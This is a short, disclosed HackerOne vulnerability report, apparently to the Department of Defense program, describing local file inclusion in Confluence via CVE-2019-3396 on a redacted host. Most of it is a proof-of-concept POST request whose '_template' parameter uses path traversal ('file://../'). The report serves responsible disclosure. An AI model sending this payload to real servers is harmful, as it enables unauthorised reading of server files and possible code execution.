LFI with potential to RCE on ██████ using CVE-2019-3396

Disclosed: 2019-10-04 15:17:21 By nahamsec To deptofdefense
High
Vulnerability Details
#POC ``` POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: ██████ Content-Type: application/json Content-Length: 174 {"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=wHEHYJpCkpg","width":"300","height":"200","_template":"file://../"}}} ``` Thanks, Ben ## Impact #
Actions
View on HackerOne
Report Stats
  • Report ID: 538771
  • State: Closed
  • Substate: resolved
  • Upvotes: 53
Share this report